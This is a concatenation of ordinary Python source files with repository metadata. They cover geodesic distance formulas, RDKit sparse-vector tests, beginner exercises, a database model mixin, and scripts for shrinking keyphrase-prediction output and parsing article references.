u2 = cosalpha_sq * (a * a - b * b ) / (b * b)
A = 1.0 + (u2 / 16384) * (4096 + u2 * (-768 + u2 * \
(320 - 175 * u2) ) )
B = (u2 / 1024) * (256 + u2 * (-128 + u2 * (74 - 47 * u2) ) )
# Starting with the approximation
sigma = (s / (b * A))
last_sigma = 2.0 * sigma + 2.0 # something impossible
# Iterate the following three equations
# until there is no significant change in sigma
# two_sigma_m , delta_sigma
while ( abs( (last_sigma - sigma) / sigma) > 1.0e-9 ) :
two_sigma_m = 2 * sigma1 + sigma
delta_sigma = B * math.sin(sigma) * ( math.cos(two_sigma_m) \
+ (B/4) * (math.cos(sigma) * \
(-1 + 2 * math.pow( math.cos(two_sigma_m), 2 ) - \
(B/6) * math.cos(two_sigma_m) * \
(-3 + 4 * math.pow(math.sin(sigma), 2 )) * \
(-3 + 4 * math.pow( math.cos (two_sigma_m), 2 ))))) \
last_sigma = sigma
sigma = (s / (b * A)) + delta_sigma
phi2 = math.atan2 ( (math.sin(U1) * math.cos(sigma) + math.cos(U1) * math.sin(sigma) * math.cos(alpha12) ), \
((1-f) * math.sqrt( math.pow(Sinalpha, 2) + \
pow(math.sin(U1) * math.sin(sigma) - math.cos(U1) * math.cos(sigma) * math.cos(alpha12), 2))))
lembda = math.atan2( (math.sin(sigma) * math.sin(alpha12 )), (math.cos(U1) * math.cos(sigma) - \
math.sin(U1) * math.sin(sigma) * math.cos(alpha12)))
C = (f/16) * cosalpha_sq * (4 + f * (4 - 3 * cosalpha_sq ))
omega = lembda - (1-C) * f * Sinalpha * \
(sigma + C * math.sin(sigma) * (math.cos(two_sigma_m) + \
C * math.cos(sigma) * (-1 + 2 * math.pow(math.cos(two_sigma_m),2) )))
lembda2 = lembda1 + omega
alpha21 = math.atan2 ( Sinalpha, (-math.sin(U1) * math.sin(sigma) + \
math.cos(U1) * math.cos(sigma) * math.cos(alpha12)))
alpha21 = alpha21 + two_pi / 2.0
if ( alpha21 < 0.0 ) :
alpha21 = alpha21 + two_pi
if ( alpha21 > two_pi ) :
alpha21 = alpha21 - two_pi
return phi2, lembda2, alpha21
# END of Vincenty's Direct formulae
##---------------------------------------------------------------------------
# Notes:
#
# * "The inverse formulae may give no solution over a line
# between two nearly antipodal points. This will occur when
# lembda ... is greater than pi in absolute value". (Vincenty, 1975)
#
# * In Vincenty (1975) L is used for the difference in longitude,
# however for consistency with other formulae in this Manual,
# omega is used here.
#
# * Variables specific to Vincenty's formulae are shown below,
# others common throughout the manual are shown in the Glossary.
#
#
# alpha = Azimuth of the geodesic at the equator
# U = Reduced latitude
# lembda = Difference in longitude on an auxiliary sphere (lembda1 & lembda2
# are the geodetic longitudes of points 1 & 2)
# sigma = Angular distance on a sphere, from point 1 to point 2
# sigma1 = Angular distance on a sphere, from the equator to point 1
# sigma2 = Angular distance on a sphere, from the equator to point 2
# sigma_m = Angular distance on a sphere, from the equator to the
# midpoint of the line from point 1 to point 2
# u, A, B, C = Internal variables
#
#
# Sample Data
#
# Flinders Peak
# -37o57'03.72030"
# 144o25'29.52440"
# Buninyong
# -37o39'10.15610"
# 143o55'35.38390"
# Ellipsoidal Distance
# 54,972.271 m
#
# Forward Azimuth
# 306o52'05.37"
#
# Reverse Azimuth
# 127o10'25.07"
#
#
##*******************************************************************
# Test driver
if __name__ == "__main__" :
# WGS84
a = 6378137.0
b = 6356752.3142
f = (a-b)/a
print "\n Ellipsoidal major axis = %12.3f metres\n" % ( a )
print "\n Inverse flattening = %15.9f\n" % ( 1.0/f )
print "\n Test Flinders Peak to Buninyon"
print "\n ****************************** \n"
phi1 = -(( 3.7203 / 60. + 57) / 60. + 37 )
lembda1 = ( 29.5244 / 60. + 25) / 60. + 144
print "\n Flinders Peak = %12.6f, %13.6f \n" % ( phi1, lembda1 )
deg = int(phi1)
min = int(abs( ( phi1 - deg) * 60.0 ))
sec = abs(phi1 * 3600 - deg * 3600) - min * 60
print " Flinders Peak = %3i\xF8%3i\' %6.3f\", " % ( deg, min, sec ),
deg = int(lembda1)
min = int(abs( ( lembda1 - deg) * 60.0 ))
sec = abs(lembda1 * 3600 - deg * 3600) - min * 60
print " %3i\xF8%3i\' %6.3f\" \n" % ( deg, min, sec )
phi2 = -(( 10.1561 / 60. + 39) / 60. + 37 )
lembda2 = ( 35.3839 / 60. + 55) / 60. + 143
print "\n Buninyon = %12.6f, %13.6f \n" % ( phi2, lembda2 )
deg = int(phi2)
min = int(abs( ( phi2 - deg) * 60.0 ))
sec = abs(phi2 * 3600 - deg * 3600) - min * 60
print " Buninyon = %3i\xF8%3i\' %6.3f\", " % ( deg, min, sec ),
deg = int(lembda2)
min = int(abs( ( lembda2 - deg) * 60.0 ))
sec = abs(lembda2 * 3600 - deg * 3600) - min * 60
print " %3i\xF8%3i\' %6.3f\" \n" % ( deg, min, sec )
dist, alpha12, alpha21 = vinc_dist ( f, a, math.radians(phi1), math.radians(lembda1), math.radians(phi2), math.radians(lembda2) )
alpha12 = math.degrees(alpha12)
alpha21 = math.degrees(alpha21)
print "\n Ellipsoidal Distance = %15.3f metres\n should be 54972.271 m\n" % ( dist )
print "\n Forward and back azimuths = %15.6f, %15.6f \n" % ( alpha12, alpha21 )
deg = int(alpha12)
min = int( abs(( alpha12 - deg) * 60.0 ) )
sec = abs(alpha12 * 3600 - deg * 3600) - min * 60
print " Forward azimuth = %3i\xF8%3i\' %6.3f\"\n" % ( deg, min, sec )
deg = int(alpha21)
min = int(abs( ( alpha21 - deg) * 60.0 ))
sec = abs(alpha21 * 3600 - deg * 3600) - min * 60
print " Reverse azimuth = %3i\xF8%3i\' %6.3f\"\n" % ( deg, min, sec )
# Test the direct function */
phi1 = -(( 3.7203 / 60. + 57) / 60. + 37 )
lembda1 = ( 29.5244 / 60. + 25) / 60. + 144
dist = 54972.271
alpha12 = ( 5.37 / 60. + 52) / 60. + 306
phi2 = lembda2 = 0.0
alpha21 = 0.0
phi2, lembda2, alpha21 = vinc_pt ( f, a, math.radians(phi1), math.radians(lembda1), math.radians(alpha12), dist )
phi2 = math.degrees(phi2)
lembda2 = math.degrees(lembda2)
alpha21 = math.degrees(alpha21)
print "\n Projected point =%11.6f, %13.6f \n" % ( phi2, lembda2 )
deg = int(phi2)
min = int(abs( ( phi2 - deg) * 60.0 ))
sec = abs( phi2 * 3600 - deg * 3600) - min * 60
print " Projected Point = %3i\xF8%3i\' %6.3f\", " % ( deg, min, sec ),
deg = int(lembda2)
min = int(abs( ( lembda2 - deg) * 60.0 ))
sec = abs(lembda2 * 3600 - deg * 3600) - min * 60
print " %3i\xF8%3i\' %6.3f\"\n" % ( deg, min, sec )
print " Should be Buninyon \n"
print "\n Reverse azimuth = %10.6f \n" % ( alpha21 )
deg = int(alpha21)
min = int(abs( ( alpha21 - deg) * 60.0 ))
sec = abs(alpha21 * 3600 - deg * 3600) - min * 60
print " Reverse azimuth = %3i\xF8%3i\' %6.3f\"\n\n" % ( deg, min, sec )
# lat/lon of New York
lat1 = 40.78
lon1 = -73.98
# lat/lon of London.
lat2 = 51.53
lon2 = 0.08
print 'New York to London:'
gc = GreatCircle((2*a+b)/3.,(2*a+b)/3.,lon1,lat1,lon2,lat2)
print 'geodesic distance using a sphere with WGS84 mean radius = ',gc.distance
print 'lon/lat for 10 equally spaced points along geodesic:'
lons,lats = gc.points(10)
for lon,lat in zip(lons,lats):
print lon,lat
gc = GreatCircle(a,b,lon1,lat1,lon2,lat2)
print 'geodesic distance using WGS84 ellipsoid = ',gc.distance
print 'lon/lat for 10 equally spaced points along geodesic:'
lons,lats = gc.points(10)
for lon,lat in zip(lons,lats):
print lon,lat
| [
"(no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed"
] | (no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed |
7ff5ace33b7b5f94bd27e78e54a51bb4adfe7e97 | e58fcc1467ad81084b016d2a48d672d75da2c058 | /rdkit/Code/DataStructs/Wrap/testSparseIntVect.py | 3cc02547f6b0be4e87ec009699478e2eb5f412f7 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ali1810/sol_heroku | 294375d70c656452749e959bfb851a50defc0e01 | 97b548ce7d864e6fed936c53b790c1dc8038cff2 | refs/heads/main | 2023-08-15T06:18:26.933254 | 2021-09-14T10:20:19 | 2021-09-14T10:20:19 | 405,223,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,585 | py | # $Id$
#
# Copyright (C) 2007,2008 Greg Landrum
#
# @@ All Rights Reserved @@
#
import os, sys
import io
import unittest
import pickle
from rdkit import RDConfig
from rdkit import DataStructs as ds
import random
def feq(v1, v2, tol=1e-4):
return abs(v1 - v2) < tol
class TestCase(unittest.TestCase):
def setUp(self):
pass
def test1Int(self):
"""
"""
v1 = ds.IntSparseIntVect(5)
self.assertRaises(IndexError, lambda: v1[5])
v1[0] = 1
v1[2] = 2
v1[3] = 3
self.assertTrue(v1 == v1)
self.assertTrue(v1.GetLength() == 5)
v2 = ds.IntSparseIntVect(5)
self.assertTrue(v1 != v2)
v2 |= v1
self.assertTrue(v2 == v1)
v3 = v2 | v1
self.assertTrue(v3 == v1)
onVs = v1.GetNonzeroElements()
self.assertTrue(onVs == {0: 1, 2: 2, 3: 3})
def test2Long(self):
"""
"""
l = 1 << 42
v1 = ds.LongSparseIntVect(l)
self.assertRaises(IndexError, lambda: v1[l])
v1[0] = 1
v1[2] = 2
v1[1 << 35] = 3
self.assertTrue(v1 == v1)
self.assertTrue(v1.GetLength() == l)
v2 = ds.LongSparseIntVect(l)
self.assertTrue(v1 != v2)
v2 |= v1
self.assertTrue(v2 == v1)
v3 = v2 | v1
self.assertTrue(v3 == v1)
onVs = v1.GetNonzeroElements()
self.assertTrue(onVs == {0: 1, 2: 2, 1 << 35: 3})
def test3Pickle1(self):
"""
"""
l = 1 << 42
v1 = ds.LongSparseIntVect(l)
self.assertRaises(IndexError, lambda: v1[l + 1])
v1[0] = 1
v1[2] = 2
v1[1 << 35] = 3
self.assertTrue(v1 == v1)
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(v2 == v1)
v3 = ds.LongSparseIntVect(v2.ToBinary())
self.assertTrue(v2 == v3)
self.assertTrue(v1 == v3)
#pickle.dump(v1,file('lsiv.pkl','wb+'))
with open(os.path.join(RDConfig.RDBaseDir, 'Code/DataStructs/Wrap/testData/lsiv.pkl'),
'r') as tf:
buf = tf.read().replace('\r\n', '\n').encode('utf-8')
tf.close()
with io.BytesIO(buf) as f:
v3 = pickle.load(f)
self.assertTrue(v3 == v1)
def test3Pickle2(self):
"""
"""
l = 1 << 21
v1 = ds.IntSparseIntVect(l)
self.assertRaises(IndexError, lambda: v1[l + 1])
v1[0] = 1
v1[2] = 2
v1[1 << 12] = 3
self.assertTrue(v1 == v1)
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(v2 == v1)
v3 = ds.IntSparseIntVect(v2.ToBinary())
self.assertTrue(v2 == v3)
self.assertTrue(v1 == v3)
#pickle.dump(v1,file('isiv.pkl','wb+'))
with open(os.path.join(RDConfig.RDBaseDir, 'Code/DataStructs/Wrap/testData/isiv.pkl'),
'r') as tf:
buf = tf.read().replace('\r\n', '\n').encode('utf-8')
tf.close()
with io.BytesIO(buf) as f:
v3 = pickle.load(f)
self.assertTrue(v3 == v1)
def test4Update(self):
"""
"""
v1 = ds.IntSparseIntVect(5)
self.assertRaises(IndexError, lambda: v1[6])
v1[0] = 1
v1[2] = 2
v1[3] = 3
self.assertTrue(v1 == v1)
v2 = ds.IntSparseIntVect(5)
v2.UpdateFromSequence((0, 2, 3, 3, 2, 3))
self.assertTrue(v1 == v2)
def test5Dice(self):
"""
"""
v1 = ds.IntSparseIntVect(5)
v1[4] = 4
v1[0] = 2
v1[3] = 1
self.assertTrue(feq(ds.DiceSimilarity(v1, v1), 1.0))
v1 = ds.IntSparseIntVect(5)
v1[0] = 2
v1[2] = 1
v1[3] = 4
v1[4] = 6
v2 = ds.IntSparseIntVect(5)
v2[1] = 2
v2[2] = 3
v2[3] = 4
v2[4] = 4
self.assertTrue(feq(ds.DiceSimilarity(v1, v2), 18.0 / 26.))
self.assertTrue(feq(ds.DiceSimilarity(v2, v1), 18.0 / 26.))
def test6BulkDice(self):
"""
"""
sz = 10
nToSet = 5
nVs = 6
import random
vs = []
for i in range(nVs):
v = ds.IntSparseIntVect(sz)
for j in range(nToSet):
v[random.randint(0, sz - 1)] = random.randint(1, 10)
vs.append(v)
baseDs = [ds.DiceSimilarity(vs[0], vs[x]) for x in range(1, nVs)]
bulkDs = ds.BulkDiceSimilarity(vs[0], vs[1:])
for i in range(len(baseDs)):
self.assertTrue(feq(baseDs[i], bulkDs[i]))
def test6BulkTversky(self):
"""
"""
sz = 10
nToSet = 5
nVs = 6
import random
vs = []
for i in range(nVs):
v = ds.IntSparseIntVect(sz)
for j in range(nToSet):
v[random.randint(0, sz - 1)] = random.randint(1, 10)
vs.append(v)
baseDs = [ds.TverskySimilarity(vs[0], vs[x], .5, .5) for x in range(1, nVs)]
bulkDs = ds.BulkTverskySimilarity(vs[0], vs[1:], 0.5, 0.5)
diceDs = [ds.DiceSimilarity(vs[0], vs[x]) for x in range(1, nVs)]
for i in range(len(baseDs)):
self.assertTrue(feq(baseDs[i], bulkDs[i]))
self.assertTrue(feq(baseDs[i], diceDs[i]))
bulkDs = ds.BulkTverskySimilarity(vs[0], vs[1:], 1.0, 1.0)
taniDs = [ds.TanimotoSimilarity(vs[0], vs[x]) for x in range(1, nVs)]
for i in range(len(bulkDs)):
self.assertTrue(feq(bulkDs[i], taniDs[i]))
taniDs = ds.BulkTanimotoSimilarity(vs[0], vs[1:])
for i in range(len(bulkDs)):
self.assertTrue(feq(bulkDs[i], taniDs[i]))
def test7ToList(self):
l = [0]*2048
nbits = 2048
bv = ds.IntSparseIntVect(nbits)
for j in range(nbits):
x = random.randrange(0, nbits)
l[x] = x
bv[x] = x
l2 = list(bv)
l3 = bv.ToList()
self.assertEqual(l, l2)
self.assertEqual(l, l3)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
f37b4202698b801244e4f37eb349143a2286421f | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /070_oop/007_exceptions/_exercises/templates/GoCongr/035_warnings.py | 64f70487a6f6966148382366c83ea4f50b5aa248 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 682 | py | # # w____
# ________ w____
#
#
# ___ input_body_parameter name unit supposed_maximum
# parameter _ fl.. inp.. 'Enter your @ (in @): '.f.... n.. u...
# __ ? < _ 0:
# r____ V... n.. + ' cannot be negative')
# __ ? > s...
# w____.w... 'suspiciously large value of ' + n..
# r_ ?
#
#
# ___ input_mass
# r_ i... n... _'mass' u... _'kg' s.... _ 100
#
#
# ___ input_height
# r_ i... n.. _ 'height' u... _ 'm' s.... _ 2
#
#
# ___ calculate_bmi mass height
# r_ m... / h.. ** 2)
#
#
# ___ main
# mass _ i._m.
# height _ i._h.
# bmi _ c... mass height
# print('Your body mass index is', ?
#
#
# __ _______ __ ____
# ?
| [
"[email protected]"
] | |
f6373c989bd22ce2c8959f9b63d9482b3dba981a | 271dbb5f0c23ae40f19a8df7dd3f15a44fbe5ae1 | /it-king/day01/while.py | 5c0bdb341ea377ada180d290ccf004639cd7d5df | [] | no_license | obligate/python3-king | a4d1c5c145c3b1c42efe059cf2bbd797d0b3c528 | 2b31400468c7a2621f29f24f82e682eb07c0e17d | refs/heads/master | 2020-05-02T11:45:16.218771 | 2019-03-27T08:05:39 | 2019-03-27T08:05:39 | 177,938,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | # Author: Peter
count = 0
while True:
print('count:', count)
count = count + 1
| [
"[email protected]"
] | |
b0084b0539780db5582ce0d7f2cdd843f26384e9 | 6defeaa9e3eff61cd861c855ed2f65db2a457564 | /onmt/keyphrase/shrink_pred_files.py | b0f94a88ab0e0f5a110485f683a9c904dd885b63 | [
"MIT"
] | permissive | memray/OpenNMT-kpg-release | 50439d2a58d4499b3a4b1d1fdb586d266c4367e7 | d16bf09e21521a6854ff3c7fe6eb271412914960 | refs/heads/master | 2023-08-17T14:32:04.442881 | 2023-01-31T03:24:46 | 2023-01-31T03:24:46 | 213,238,221 | 222 | 34 | MIT | 2023-07-22T18:03:01 | 2019-10-06T20:23:17 | Jupyter Notebook | UTF-8 | Python | false | false | 6,961 | py | # -*- coding: utf-8 -*-
"""
Some pred files use up too much space, e.g. /zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2seq/meng17-one2seq-kp20k-topmodels/meng17-one2seq-fullbeam/meng17-one2seq-beam50-maxlen40/pred/kp20k-meng17-verbatim_prepend-rnn-BS64-LR0.05-Layer1-Dim150-Emb100-Dropout0.0-Copytrue-Reusetrue-Covtrue-PEfalse-Contboth-IF1_step_95000/kp20k.pred is 8.3GB, beam=10 size=2.0GB.
So this
"""
import json
import os
__author__ = "Rui Meng"
__email__ = "[email protected]"
if __name__ == '__main__':
# root_path = ' /zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/transfer_exps/kp/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/transfer_exps/kp_o2o/'
# root_path = '/zfs1/hdaqing/rum20/kp/fairseq-kpg/exps/'
# root_path = '/zfs1/hdaqing/rum20/kp/fairseq-kpg/exps/kp_fewshot10k'
# root_path = '/zfs1/hdaqing/rum20/kp/transfer_exps/kp_fewshot-v2'
root_path = '/zfs1/hdaqing/rum20/kp/transfer_exps/bart_DAFT-v1-DA1e6_FT1e5'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2seq/meng17-one2seq-kp20k-v3/meng17-one2seq-fullbeam/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2seq/meng17-one2seq-kp20k-v2/meng17-one2seq-fullbeam/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2seq/meng17-one2seq-kp20k-topmodels/meng17-one2seq-fullbeam/meng17-one2seq-beam50-maxlen40/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2one/meng17-one2one-kp20k-v3/meng17-one2one-fullbeam/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2one/'
# root_path = '/zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/order_matters/transformer/meng17-one2seq-beam50-maxlen40/'
print(root_path)
dataset_line_counts = {
'kp20k': 19987,
# 'kp20k_valid2k': 2000,
'inspec': 500,
'krapivin': 460,
'nus': 211,
'semeval': 100,
# 'duc': 308,
'kp20k_test': 19987,
'openkp_test': 6614,
'kptimes_test': 10000,
'jptimes_test': 10000,
'stackex_test': 16000,
'kp20k_valid2k_test': 2000,
'openkp_valid2k_test': 2000,
'kptimes_valid2k_test': 2000,
'stackex_valid2k_test': 2000,
}
total_size_shrinked = 0
for root, dirs, files in os.walk(root_path, topdown=True):
for filename in files:
# print()
# print('-=' * 50)
# print(filename)
# print('-=' * 50)
'''
Delete report
'''
if filename.endswith('.report'):
dataset_name = filename[:-7].split('-')[-1][5:]
if dataset_name in dataset_line_counts:
report_path = os.path.join(root, filename)
print('Deleting .report: [%s] %s' % (dataset_name, report_path))
ori_size = os.stat(report_path).st_size // 1024 // 1024
print('\t file size = %d MB' % (ori_size))
total_size_shrinked += ori_size
os.remove(report_path)
if filename.endswith('.report.txt'):
dataset_name = filename[:-11]
if dataset_name in dataset_line_counts:
report_path = os.path.join(root, filename)
print('Deleting .report: [%s] %s' % (dataset_name, report_path))
ori_size = os.stat(report_path).st_size // 1024 // 1024
print('\t file size = %d MB' % (ori_size))
total_size_shrinked += ori_size
os.remove(report_path)
'''
Reduce .pred file size
'''
if not filename.endswith('.pred'):
continue
dataset_name = filename[:-5].split('-')[-1][5:]
if dataset_name not in dataset_line_counts: continue
pred_path = os.path.join(root, filename)
print('Shrinking .pred: [%s] %s' % (dataset_name, pred_path))
ori_size = os.stat(pred_path).st_size // 1024 // 1024
print('\t file size = %d MB' % (ori_size))
# ensure the pred is complete
with open(pred_path, 'r') as pred_file:
lines = [l if lid==0 else '' for lid, l in enumerate(pred_file)]
if len(lines) != dataset_line_counts[dataset_name]:
# print('Prediction ongoing, skip!')
continue
pred_dict = json.loads(lines[0])
# not a model output
if 'attns' not in pred_dict:
continue
# indicating it's already shrinked, skip
if pred_dict['src'] == None:
# if pred_dict['attns'] == None and pred_dict['dup_pred_tuples'] == None:
# print('This pred file has been shrinked, skip!')
continue
tmp_pred_path = pred_path + '.tmp'
tmp_pred_file = open(tmp_pred_path, 'w')
with open(pred_path, 'r') as pred_file:
for lid, line in enumerate(pred_file):
try:
pred_dict = json.loads(line)
except:
tmp_pred_file.write(line.strip() + '\n')
print("Error occurs while loading line %d in %s" % (lid, pred_path))
continue
# for k,v in pred_dict.items():
# print('%s' % k)
pred_dict['src'] = None
pred_dict['preds'] = None
# pred_dict['pred_scores'] = None
pred_dict['attns'] = None
pred_dict['copied_flags'] = None
pred_dict['ori_pred_sents'] = None
pred_dict['ori_pred_scores'] = None
pred_dict['ori_preds'] = None
pred_dict['dup_pred_tuples'] = None
tmp_pred_file.write(json.dumps(pred_dict)+'\n')
# tmp_pred_file.close()
print('\tDumped to: ' + pred_path + '.tmp')
new_size = os.stat(tmp_pred_path).st_size // 1024 // 1024
print('\t new file size = %d MB' % (new_size))
print('\t reduced size = %d MB' % (ori_size-new_size))
total_size_shrinked += (ori_size - new_size)
# replace the original file to release space
os.remove(pred_path)
os.rename(tmp_pred_path, pred_path)
print('Total shrinked size = %d MB' % (total_size_shrinked))
| [
"[email protected]"
] | |
d4a331fd126d3de9e4c2126c8127d132a767d784 | 501176c17ecfda9fc2641c407b044b51364afa8e | /BootCamp/python/example/example.py | c4a02a67d17d6beae597df85db0c307a24e907bd | [] | no_license | melissa-koi/betterbuys | fcc6d6bfc1f37a644258d7bcf52eb93597674fd6 | edc40636c14ee341835bd8f77fd9ae91767b220a | refs/heads/main | 2023-05-26T13:59:59.503289 | 2021-06-10T05:35:43 | 2021-06-10T05:35:43 | 375,577,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,146 | py | # import sys
#
# name = sys.argv[1]
# print("How old are you?")
# age = int(input())
#
# print(name)
# print(age)
# height = 69
# if height > 70:
# print("You are really tall")
# elif height > 60:
# print("You are of average height")
# else:
# print("You are really short")
# name = ""
# list_a = []
#
# if list_a:
# print("True")
# else:
# print("False")
# list_a = range(0, 5)
# print(list_a)
# for i in range(0, 7):
# print("I would love " + str(i) + " cookies")
# numbers = [1, 2, 3, 4, 5]
# for i in numbers:
# if i % 2 == 0:
# print(i)
# players = 11
# while players >= 5:
# print("The remaining players are ", players)
# players -= 1
# number = 0
# while True:
# print("I love candy " + str(number))
# number += 1
# if number == 7:
# break
# numTaken = [3, 5, 7, 11, 13]
# print("Available Numbers")
#
# for i in range(1, 21):
# if i in numTaken:
# continue # or break
# print(i)
# my_list = []
# my_other_list = list()
# list_a = ["a", "b", "c", "d"] # list of strings
# list_b = [1, 2, 3, 4, 5, 6] # list of numbers
# list_c = [1, "west", 34, "longitude"] # mixed list
# list_d = [ ["a","b","c","d"],[1,2,3,4,5,6],[1,"west",34,"longitude"]] # nested list
#
# list_a.extend(list_b)
# print(list_a)
# print(list_b)
# my_cat = {'name': 'Mr.Sniffles', 'age': 18, 'color': 'black'}
#
# print(my_cat['name'])
# print(my_cat)
#
# print(list(my_cat.keys()))
# print("Enter a string")
# input_string = input()
# characters = {}
#
# for character in input_string:
# characters.setdefault(character, 0)
# characters[character] = characters[character] + 1
#
# print(characters)
# print('What is your name?')
# name = input()
# print('How old are you?')
# age = input()
# print(f"My name is {name} and i am {age} years old")
# name = "James"
# age = 19
# weight = '79' # Kilograms
#
# age_weight_ratio = int(weight)/age
# age_weight_ratio2 = float(weight)/age
#
# print(age_weight_ratio)
# print(age_weight_ratio2)
def fun_a(a=1, b=4):
print(a + b)
fun_a()
def fun_b():
pass
def fun_c(a, b):
return a + b
sum = fun_c(5, 8)
print(sum)
| [
"[email protected]"
] | |
2102df986d73ba8bded087840712c105503e1d9e | 1e660c91d0ae300ad6907a97941441fc8e73d5dc | /api/models/mixins.py | aa77a920c2b5911c3ee17653ec4e9346cb85c4ce | [] | no_license | SEUNAGBEYE/Stocky | 55d65e8ba7e7ff5228863e3c242c6499b2078ca7 | b2129b0a166a08d14c809cf4e0d711a7c469c91c | refs/heads/develop | 2023-02-23T11:26:46.160005 | 2019-04-01T04:11:06 | 2019-04-01T04:11:06 | 178,017,757 | 0 | 0 | null | 2023-02-07T22:21:11 | 2019-03-27T15:00:34 | Python | UTF-8 | Python | false | false | 2,735 | py | """Module for generic model operations mixin."""
from .config import db
class ModelMixin:
"""Mixin class with generic model operations."""
def save(self):
"""
Save a model instance
"""
db.session.add(self)
db.session.commit()
return self
def update_(self, **kwargs):
"""
Updates a record
Args:
kwargs (dict): Key-value pair of the attributes to update
Returns:
(dict) The updated record
"""
for field, value in kwargs.items():
setattr(self, field, value)
db.session.commit()
@classmethod
def get(cls, id):
"""
Gets a record by id
Args:
id (int): Unique identifier for the recod
Returns:
(dict) The found record
"""
return cls.query.get(id)
@classmethod
def get_or_404(cls, id):
"""
Gets a record or return 404
Args:
id (int): Unique identifier for the recod
Returns:
(dict) The found record
Raises:
(exception) Not found exeption if the record does not exist
"""
record = cls.get(id)
if not record:
raise ValidationError(
{
'message':
f'{re.sub(r"(?<=[a-z])[A-Z]+",lambda x: f" {x.group(0).lower()}" , cls.__name__)} not found' # noqa
},
404)
return record
def delete(self):
"""
Soft delete a model instance.
"""
pass
@classmethod
def count(cls):
"""
Returns the number of records that satify a query
"""
return cls.query.count()
@classmethod
def find_or_create(cls, data, **kwargs):
"""
Finds a model instance or creates it
Args:
data (dict): details of the record to be created
Returns:
(dict) The found record or newly created record
"""
instance = cls.query.filter_by(**kwargs).first()
if not instance:
instance = cls(**data).save()
return instance
@classmethod
def bulk_create(cls, objects):
"""
Saves a list of records (dict) to database
Args:
objects (list): List of records to be saved to database
Returns:
(list): A list of the newly created records
"""
resource_list = [cls(**item) for item in objects]
db.session.add_all(resource_list)
db.session.commit()
return resource_list
| [
"[email protected]"
] | |
aa0da87f9190e8296e72752194ba5b8957bb36fa | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/meetup/2b4a2462e86149f3a94264f7c35aef7a.py | ac0930b773da25cb6f1e91324fa9ea02ed62294a | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 614 | py | from calendar import monthrange
from datetime import date
def meetup_day(year, month, day_of_the_week, which):
month_length = monthrange(year, month)[1]
days_in_month = (date(year, month, day)
for day in range(1, month_length + 1))
candidates = [date_
for daye_ in days_in_month
if day_name(date_) == day_of_the_week]
if which == 'teenth':
return next(d for d in candidates if 13 <= d.day <= 19)
if which == 'last':
return candidates[-1]
return candidates[int(which[0]) - 1 ]
def day_name(date_):
return date_.strftime('%A')
| [
"[email protected]"
] | |
5a3533fe380107f7a518cfd59cc2bc0bf7a77c6a | 7556542c8c6ae157542300ce45388a8cb0213edb | /cocitation/co-citation-finding.py | 7e0a03491b4cf421e14f206531faccb9b8550960 | [
"Apache-2.0"
] | permissive | hyyc116/Therapies_finding | 2229f567c157d17a7ed947d62a78d3487151540c | 1ee36190e5b85ac89d2836c67ab60c1168c3b1b0 | refs/heads/master | 2021-01-17T12:46:32.491077 | 2017-04-06T20:28:45 | 2017-04-06T20:28:45 | 84,074,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,042 | py | #coding:utf-8
import sys
sys.path.append(".")
sys.path.append("..")
from tools.xml_parser import *
reload(sys)
sys.setdefaultencoding('utf-8')
import re
from collections import defaultdict
import json
#Get references
def parse_references_with_index(indexpath):
count =0
for path in open(indexpath):
count+=1
if not path.strip().endswith('.nxml'):
continue
if count%100==1:
sys.stderr.write('{:}\n'.format(count))
path = path.strip()
doc = parse_doc(path)
titles = []
for title in parse_pmc_references(doc):
titles.append(title)
headers = re.sub(r"\s+",' ','. '.join(titles)+".")
doi = parse_pmc_doi(doc)
print doi+"\t"+headers.encode('utf-8')
#get body text
def parse_indexes(indexpath,nplist):
count=0
find_doc_count=0
tf_dic=defaultdict(list)
for path in open(indexpath):
count+=1
if not path.strip().endswith('.nxml'):
continue
if count%10==1:
sys.stderr.write('PROGRESS:{:},'.format(count))
sys.stderr.write('find {:} docs.\n'.format(find_doc_count))
path = path.strip()
content = open(path).read().lower()
if "parkinson's disease" not in content:
continue
find_doc_count+=1
content = parse_body_abstext(path)
content = re.sub(r'\s+'," ",content.replace('-'," ").lower())
for np in nplist:
if np in content:
tf_dic[np].append(path)
open("parkinson-tf.dict",'w').write(json.dumps(tf_dic))
for np in tf_dic.keys():
